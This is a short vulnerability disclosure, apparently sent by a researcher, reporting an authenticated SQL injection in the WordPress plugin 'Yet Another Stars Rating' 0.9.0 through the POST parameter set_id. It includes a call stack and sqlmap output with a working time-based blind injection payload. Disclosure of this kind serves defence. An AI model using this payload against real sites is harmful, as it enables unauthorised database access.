Hello,
Plugin: yet another stars rating 0.9.0
Remote authenticated users with 'publish_posts' role can execute arbitrary SQL commands.
1. SQL injection (yasr_get_multi_set_values_and_field())
Method: POST
Vulnerable parameter: set_id
Example PHP callstack:
yasr_output_multiple_set_callback [/yet-another-stars-rating/lib/yasr-ajax-functions.php:192]
yasr_get_multi_set_values_and_field [yet-another-stars-rating/lib/yasr-db-functions.php:220]
wpdb::get_results
Sqlmap verification:
...
Parameter: set_id (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: set_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))FFpb)&post_id=1
...
--
Regards,
Marcin Probola,